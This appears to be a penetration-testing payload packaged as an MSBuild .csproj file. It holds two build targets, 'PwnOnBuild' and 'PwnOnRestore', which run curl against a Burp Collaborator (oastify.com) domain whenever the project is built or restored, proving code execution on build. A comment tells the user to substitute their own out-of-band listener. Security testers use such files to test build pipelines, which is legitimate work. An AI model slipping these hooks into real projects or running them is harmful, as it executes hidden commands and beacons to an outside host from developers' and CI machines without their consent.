<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net472</TargetFramework>
  </PropertyGroup>

  <!-- PENTEST PAYLOAD: replace COLLAB_DOMAIN with your Burp Collaborator / OOB listener domain -->
  <Target Name="PwnOnBuild" BeforeTargets="Build">
    <Exec Command="curl http://ioa9aj9hzzaabbcomjxdt9wa218swik7.oastify.com/msbuild-build-exec" />
  </Target>
  <Target Name="PwnOnRestore" BeforeTargets="Restore">
    <Exec Command="curl http://ioa9aj9hzzaabbcomjxdt9wa218swik7.oastify.com/msbuild-restore-exec" />
  </Target>
</Project>
